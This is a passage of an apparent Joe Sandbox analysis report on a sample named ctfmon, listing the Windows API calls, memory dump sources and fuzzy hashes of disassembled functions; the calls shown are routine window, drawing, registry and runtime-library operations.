GetWindow.USER32(?,00000002), ref: 0040C2F6
GetWindow.USER32(?,00000002), ref: 0040C308
GetWindowLongW.USER32(?,000000EC), ref: 0040C318
IsWindowVisible.USER32(?), ref: 0040C331
GetTopWindow.USER32(?), ref: 0040C357

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long$Parent$Visible
String ID:
API String ID: 3473418232-0
Opcode ID: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
Instruction ID: ba862818f269e3aceee2273a44a1f29cc0207a7b62508aff36e6de7303c25c2b
Opcode Fuzzy Hash: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
Instruction Fuzzy Hash: FD219072740724ABD731AB669C89F2FB2ACAF40754F44873ABD41B72D1C638DC0587A8

Function 00425B90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85stringtimeCOMMON

Download Yara Rule

APIs

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BBA
GetFileTime.KERNEL32(00000000,z[B,?,?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BDB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BEA
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425C0B

Strings

z[B, xrefs: 00425B98, 00425C1D, 00425C2E, 00425C40, 00425BA5
z[B, xrefs: 00425BD6, 00425C18, 00425BD9, 00425C1C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID: z[B$z[B
API String ID: 1499663573-648401610
Opcode ID: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
Instruction ID: b0b1fca4624fb2a0d4a84746afc2279bc6a5ac128e51e5953a8924eafc8c791d
Opcode Fuzzy Hash: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
Instruction Fuzzy Hash: 2B318072600615AFC720DFA1DCC5AABBBB8BB14310F504A2AF156D7280E774B989CB94

Function 0042725B Relevance: 10.6, APIs: 7, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00427264
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 00427281
GetFocus.USER32 ref: 00427293
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272A3
GetLastActivePopup.USER32(?), ref: 004272C6
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272D6
SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 004272F5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
Instruction ID: 68473f9b5d7e177251982a610d2712512d6c7068ce16a05e5002633df34013cc
Opcode Fuzzy Hash: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
Instruction Fuzzy Hash: 7011A076308229FBD6106A62FC84C3F7A6CDB827D9B9204AFF90193201DE299C06453E

Function 0041DF10 Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 0041DF20
GetWindowLongA.USER32(?,000000F0), ref: 0041DF29
InflateRect.USER32(?,00000001,00000001), ref: 0041DF88
GetParent.USER32(?), ref: 0041DF8F
ScreenToClient.USER32(00000000,?), ref: 0041DFA3
ScreenToClient.USER32(00000000,?), ref: 0041DFAB
InvalidateRect.USER32(00000000,?,00000000), ref: 0041DFC1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
String ID:
API String ID: 1809568455-0
Opcode ID: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
Instruction ID: 5c4ce70eba9561d943b507e3d2f7660809a151edc0751f07b28f757fc8d36fc6
Opcode Fuzzy Hash: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
Instruction Fuzzy Hash: BA218B72A00201AFD714DB14D8D4FBF73A9EF94760F40091EF95692291D738E986C76A

Function 00428D5C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00428D8A
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DAD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DCC
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DDC
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DE6

Strings

software, xrefs: 00428D74

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
Instruction ID: b72b22ee4a62b1fdbc469c719b3260cc0ea8d96049bfbdf274d8e70cb96c8cd0
Opcode Fuzzy Hash: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
Instruction Fuzzy Hash: 9A11E372E01128FBCB21CB9ADC84DEFFFBCEF95700F5000AAA504A2121D6709A05DBA4

Function 00427955 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 00427965
GetDeviceCaps.GDI32(?,00000058), ref: 0042799F
GetDeviceCaps.GDI32(?,0000005A), ref: 004279A8

Part of subcall function 0042657D: GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
Part of subcall function 0042657D: GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
Part of subcall function 0042657D: MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
Part of subcall function 0042657D: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB

MulDiv.KERNEL32(tw@,00000060,000009EC), ref: 004279CC
MulDiv.KERNEL32(00000002,?,000009EC), ref: 004279D7

Strings

tw@, xrefs: 004279B7, 00427980, 004279C1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID: tw@
API String ID: 2598972148-3122378559
Opcode ID: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
Instruction ID: 92b9790e69b5446d6c958f7dd1d8ca38bdb3d9c6a46825f3b35b29f8475d5c98
Opcode Fuzzy Hash: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
Instruction Fuzzy Hash: A3110E72700610EFEB21AF59DC44C2FBBA9EF89710B41402AE98587371C731AC82CF98

Function 0041DFD0 Relevance: 10.5, APIs: 7, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041DFDD
GetWindowRect.USER32(?,?), ref: 0041DFEB
InflateRect.USER32(?,00000001,00000001), ref: 0041DFFA
GetParent.USER32(?), ref: 0041E001
ScreenToClient.USER32(00000000,?), ref: 0041E015
ScreenToClient.USER32(00000000,?), ref: 0041E01D
ValidateRect.USER32(00000000,?), ref: 0041E031

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateLongParentValidate
String ID:
API String ID: 2275295265-0
Opcode ID: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
Instruction ID: 6b051f3026c86bdc512559a30bcbe6d5191d46f4b5e6e7f40c6fc7ebd371f8c1
Opcode Fuzzy Hash: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
Instruction Fuzzy Hash: 91F08136100202BFD321EB54DCC8DBF77BCEBC9B24F404929F91592151D774A80A8B66

Function 00424D54 Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00424D60
GetSysColor.USER32(00000010), ref: 00424D67
GetSysColor.USER32(00000014), ref: 00424D6E
GetSysColor.USER32(00000012), ref: 00424D75
GetSysColor.USER32(00000006), ref: 00424D7C
GetSysColorBrush.USER32(0000000F), ref: 00424D89
GetSysColorBrush.USER32(00000006), ref: 00424D90

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
Instruction ID: 18969bc28ed302142f8635eec16f63b65d63ba9001d0164203a570e39b19960d
Opcode Fuzzy Hash: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
Instruction Fuzzy Hash: 1EF0F871A407489BD730AB729D49B4BBAE0FFC4B10F02092AD2858BA90E6B5F4419F44

Function 0042785C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25registryclipboardCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00427869
GetVersion.KERNEL32 ref: 00427874
GetVersion.KERNEL32 ref: 0042787C
GetVersion.KERNEL32 ref: 00427882
RegisterClipboardFormatW.USER32(MSWHEEL_ROLLMSG), ref: 0042788F

Strings

MSWHEEL_ROLLMSG, xrefs: 0042788A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
Instruction ID: f412c579cb3b66504e538c215866e8624d94ca82ea27c6ff18154eccb9f95b5c
Opcode Fuzzy Hash: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
Instruction Fuzzy Hash: F4E0483AF15136D5D71137B4BD4876A25945B58351FE10077DA01433519A3C4483DB7E

Function 00428A0D Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(0053F118,0053EDA8,00000000,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A18
EnterCriticalSection.KERNEL32(0053F134,00000010,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A67
LeaveCriticalSection.KERNEL32(0053F134,00000000,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A7A
LocalAlloc.KERNEL32(00000000,00000004,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A90
LocalReAlloc.KERNEL32(?,00000004,00000002,?,0053F118,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428AA2
TlsSetValue.KERNEL32(0053F118,00000000), ref: 00428ADE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
Instruction ID: 683b195803cd3318d752987fd83c5c11aee9b06666c6d2078921f9177f6cc79e
Opcode Fuzzy Hash: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
Instruction Fuzzy Hash: 4F31AB31200615EFD724CF15D88AF6AB3A8FF44354F80892EE41AC7690DB74E816CB64

Function 0041F320 Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041F348
GetWindowTextLengthA.USER32(?), ref: 0041F352
GetWindowTextA.USER32(?,00000000,00000000), ref: 0041F37A
SetTextColor.GDI32(?,?), ref: 0041F3BB
DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 0041F3D3
SetTextColor.GDI32(?,?), ref: 0041F3E5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Text$ColorWindow$DrawLength
String ID:
API String ID: 1177705772-0
Opcode ID: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
Instruction ID: b26f12578afaccc9f8427d079972224ff864cef3ef88deb0b21f074a4f367360
Opcode Fuzzy Hash: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
Instruction Fuzzy Hash: 6D215C76600108AFC724DF98DC84ABF77A9EF84321B148229FD1997390D634AD45CB64

Function 00422809 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042280E
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042285B
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042287D
GetCapture.USER32 ref: 0042288F
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0042289E
WinHelpW.USER32(?,?,?,?), ref: 004228B2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
Instruction ID: 321176f5cdc229f6ee6c7f21b62b50d57b21ffd69a4491bdf23897e4f3332011
Opcode Fuzzy Hash: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
Instruction Fuzzy Hash: 44219131340214BFEB30AF65DC89F6E7BA9EF04744F40456DB1019B1E2CB799C008624

Function 004271B3 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004271E6
GetLastActivePopup.USER32(?), ref: 004271F5
IsWindowEnabled.USER32(?), ref: 0042720A
EnableWindow.USER32(?,00000000), ref: 0042721D
GetWindowLongW.USER32(?,000000F0), ref: 0042722F
GetParent.USER32(?), ref: 0042723D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
Instruction ID: b477ea236e12bf6e9f048e8246984b22bba05b7c439d68dba564573c6702b4fa
Opcode Fuzzy Hash: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
Instruction Fuzzy Hash: F811A332B093319787316A6ABD94B3B729C5F55B50FC501A6FD00E3301DB28DD1246BD

Function 0040FF4B Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF64
GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF76
GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF8D
GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF96
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFAF
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFD4

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CommandLine$ByteCharMultiWide
String ID:
API String ID: 3068183746-0
Opcode ID: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
Instruction ID: 64f274b490bb9753f35f974b03313c599961d3a4b4ccc6cea9b6a40c69df2725
Opcode Fuzzy Hash: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
Instruction Fuzzy Hash: E011C83270911B6BDA3057A69C40F2B369CDB533A4F210177F500F6BD0DAB5DC4956A9

Function 00402F20 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000338,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
ResetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F47
SetEvent.KERNEL32(0000033C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
WaitForSingleObject.KERNEL32(0000033C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
SetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F9E

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Event$ObjectSingleWait$ResetSleep
String ID:
API String ID: 3757991767-0
Opcode ID: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
Instruction ID: cce5b26dfa6e14c825b22c7865c66c1ad55053d17271cdbe5a1c1e3b5b80d322
Opcode Fuzzy Hash: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
Instruction Fuzzy Hash: 910171767002115BCA14DB68FD8491E73B9F79C7207540629E905A33E0CBB4E805DB74

Function 004269C5 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004269D4
GetWindow.USER32(?,00000005), ref: 004269E5
GetDlgCtrlID.USER32(00000000), ref: 004269EE
GetWindowLongW.USER32(00000000,000000F0), ref: 004269FD
GetWindowRect.USER32(00000000,?), ref: 00426A0F
PtInRect.USER32(?,?,?), ref: 00426A1F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

